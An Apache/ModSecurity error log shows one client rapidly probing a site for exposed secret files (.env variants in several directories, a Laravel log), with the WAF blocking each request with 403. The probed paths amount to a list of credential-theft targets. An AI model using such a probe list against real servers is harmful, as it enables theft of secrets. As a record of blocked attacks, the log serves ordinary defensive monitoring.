[Mon May 11 23:11:11.806372 2026] [security2:error] [pid 1630927:tid 1630946] [client 185.213.175.72:34772] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/api/.env"] [unique_id "agJF72iGYYhUwDaJINmbOwAAAVA"]
[Mon May 11 23:11:11.806590 2026] [security2:error] [pid 1630927:tid 1630946] [client 185.213.175.72:34772] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/api/.env"] [unique_id "agJF72iGYYhUwDaJINmbOwAAAVA"]
[Mon May 11 23:11:11.806684 2026] [security2:error] [pid 1606352:tid 1606425] [client 185.213.175.72:34720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.old"] [unique_id "agJF73o_DFxNSZVmaX3etQAAAMY"]
[Mon May 11 23:11:11.806708 2026] [security2:error] [pid 1601130:tid 1601171] [client 185.213.175.72:34614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agJF73EgAO_835W6c1mkXQAAAFU"]
[Mon May 11 23:11:11.807142 2026] [core:error] [pid 1588898:tid 1588918] [client 185.213.175.72:34582] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.807166 2026] [core:error] [pid 1588898:tid 1588918] [client 185.213.175.72:34582] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.807177 2026] [security2:error] [pid 1606352:tid 1606425] [client 185.213.175.72:34720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.old"] [unique_id "agJF73o_DFxNSZVmaX3etQAAAMY"]
[Mon May 11 23:11:11.807311 2026] [core:error] [pid 1601130:tid 1601171] [client 185.213.175.72:34614] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.807467 2026] [security2:error] [pid 1630927:tid 1630934] [client 185.213.175.72:34704] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.backup"] [unique_id "agJF72iGYYhUwDaJINmbOgAAAUQ"]
[Mon May 11 23:11:11.807503 2026] [core:error] [pid 1630927:tid 1630946] [client 185.213.175.72:34772] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.807685 2026] [security2:error] [pid 1630927:tid 1630946] [client 185.213.175.72:34772] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agJF72iGYYhUwDaJINmbOwAAAVA"]
[Mon May 11 23:11:11.807686 2026] [security2:error] [pid 1630927:tid 1630934] [client 185.213.175.72:34704] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.backup"] [unique_id "agJF72iGYYhUwDaJINmbOgAAAUQ"]
[Mon May 11 23:11:11.807854 2026] [security2:error] [pid 1601130:tid 1601171] [client 185.213.175.72:34614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agJF73EgAO_835W6c1mkXQAAAFU"]
[Mon May 11 23:11:11.808091 2026] [core:error] [pid 1601130:tid 1601154] [client 185.213.175.72:34870] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.808110 2026] [core:error] [pid 1601130:tid 1601154] [client 185.213.175.72:34870] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.808407 2026] [security2:error] [pid 1590352:tid 1590410] [client 185.213.175.72:34752] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.test"] [unique_id "agJF761q0G_aXAqWauQIzQAAAJI"]
[Mon May 11 23:11:11.808673 2026] [core:error] [pid 1601130:tid 1601158] [client 185.213.175.72:34758] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.808669 2026] [security2:error] [pid 1588898:tid 1588902] [client 185.213.175.72:34794] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/public/.env"] [unique_id "agJF76FW67LJTsgN3jQaPwAAAAM"]
[Mon May 11 23:11:11.808687 2026] [core:error] [pid 1601130:tid 1601158] [client 185.213.175.72:34758] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.808921 2026] [security2:error] [pid 1588898:tid 1588902] [client 185.213.175.72:34794] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/public/.env"] [unique_id "agJF76FW67LJTsgN3jQaPwAAAAM"]
[Mon May 11 23:11:11.809117 2026] [security2:error] [pid 1590352:tid 1590413] [client 185.213.175.72:34888] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/backend/.env"] [unique_id "agJF761q0G_aXAqWauQIzwAAAJU"]
[Mon May 11 23:11:11.809179 2026] [core:error] [pid 1606352:tid 1606425] [client 185.213.175.72:34720] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.809269 2026] [security2:error] [pid 1590352:tid 1590410] [client 185.213.175.72:34752] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.test"] [unique_id "agJF761q0G_aXAqWauQIzQAAAJI"]
[Mon May 11 23:11:11.809267 2026] [security2:error] [pid 1605480:tid 1605533] [client 185.213.175.72:34712] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.bak"] [unique_id "agJF7x2Cvzd_nyNfUm8NaQAAAQs"]
[Mon May 11 23:11:11.809311 2026] [security2:error] [pid 1590352:tid 1590413] [client 185.213.175.72:34888] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/backend/.env"] [unique_id "agJF761q0G_aXAqWauQIzwAAAJU"]
[Mon May 11 23:11:11.809452 2026] [security2:error] [pid 1588898:tid 1588912] [client 185.213.175.72:34692] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.development"] [unique_id "agJF76FW67LJTsgN3jQaQgAAAA0"]
[Mon May 11 23:11:11.809533 2026] [security2:error] [pid 1605480:tid 1605533] [client 185.213.175.72:34712] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.bak"] [unique_id "agJF7x2Cvzd_nyNfUm8NaQAAAQs"]
[Mon May 11 23:11:11.809807 2026] [security2:error] [pid 1606352:tid 1606425] [client 185.213.175.72:34720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agJF73o_DFxNSZVmaX3etQAAAMY"]
[Mon May 11 23:11:11.809814 2026] [security2:error] [pid 1588898:tid 1588912] [client 185.213.175.72:34692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.development"] [unique_id "agJF76FW67LJTsgN3jQaQgAAAA0"]
[Mon May 11 23:11:11.810050 2026] [core:error] [pid 1590352:tid 1590413] [client 185.213.175.72:34888] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.810169 2026] [security2:error] [pid 1605480:tid 1605532] [client 185.213.175.72:34590] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agJF7x2Cvzd_nyNfUm8NZwAAAQo"]
[Mon May 11 23:11:11.810597 2026] [core:error] [pid 1605480:tid 1605533] [client 185.213.175.72:34712] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.810707 2026] [security2:error] [pid 1590352:tid 1590413] [client 185.213.175.72:34888] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agJF761q0G_aXAqWauQIzwAAAJU"]
[Mon May 11 23:11:11.810778 2026] [security2:error] [pid 1605480:tid 1605537] [client 185.213.175.72:34682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.local"] [unique_id "agJF7x2Cvzd_nyNfUm8NZgAAAQ8"]
[Mon May 11 23:11:11.810935 2026] [security2:error] [pid 1605480:tid 1605537] [client 185.213.175.72:34682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.local"] [unique_id "agJF7x2Cvzd_nyNfUm8NZgAAAQ8"]
[Mon May 11 23:11:11.811192 2026] [core:error] [pid 1605480:tid 1605523] [client 185.213.175.72:34610] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.811211 2026] [core:error] [pid 1605480:tid 1605523] [client 185.213.175.72:34610] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.811343 2026] [security2:error] [pid 1605480:tid 1605533] [client 185.213.175.72:34712] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agJF7x2Cvzd_nyNfUm8NaQAAAQs"]
[Mon May 11 23:11:11.811506 2026] [security2:error] [pid 1590352:tid 1590403] [client 185.213.175.72:34788] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/admin/.env"] [unique_id "agJF761q0G_aXAqWauQIzgAAAIs"]
[Mon May 11 23:11:11.811807 2026] [security2:error] [pid 1590352:tid 1590403] [client 185.213.175.72:34788] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/admin/.env"] [unique_id "agJF761q0G_aXAqWauQIzgAAAIs"]
[Mon May 11 23:11:11.811850 2026] [core:error] [pid 1605480:tid 1605534] [client 185.213.175.72:34866] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.811865 2026] [core:error] [pid 1605480:tid 1605534] [client 185.213.175.72:34866] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.812375 2026] [security2:error] [pid 1605480:tid 1605546] [client 185.213.175.72:34736] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.staging"] [unique_id "agJF7x2Cvzd_nyNfUm8NaAAAARg"]
[Mon May 11 23:11:11.812539 2026] [security2:error] [pid 1605480:tid 1605546] [client 185.213.175.72:34736] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env.staging"] [unique_id "agJF7x2Cvzd_nyNfUm8NaAAAARg"]
[Mon May 11 23:11:11.812617 2026] [security2:error] [pid 1606352:tid 1606426] [client 185.213.175.72:34644] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env"] [unique_id "agJF73o_DFxNSZVmaX3euQAAAMc"]
[Mon May 11 23:11:11.812778 2026] [security2:error] [pid 1606352:tid 1606426] [client 185.213.175.72:34644] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.env"] [unique_id "agJF73o_DFxNSZVmaX3euQAAAMc"]
[Mon May 11 23:11:11.813208 2026] [core:error] [pid 1590352:tid 1590410] [client 185.213.175.72:34752] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.813301 2026] [core:error] [pid 1590352:tid 1590409] [client 185.213.175.72:34822] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.813317 2026] [core:error] [pid 1590352:tid 1590409] [client 185.213.175.72:34822] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.813341 2026] [core:error] [pid 1606352:tid 1606426] [client 185.213.175.72:34644] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.813486 2026] [security2:error] [pid 1606352:tid 1606426] [client 185.213.175.72:34644] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agJF73o_DFxNSZVmaX3euQAAAMc"]
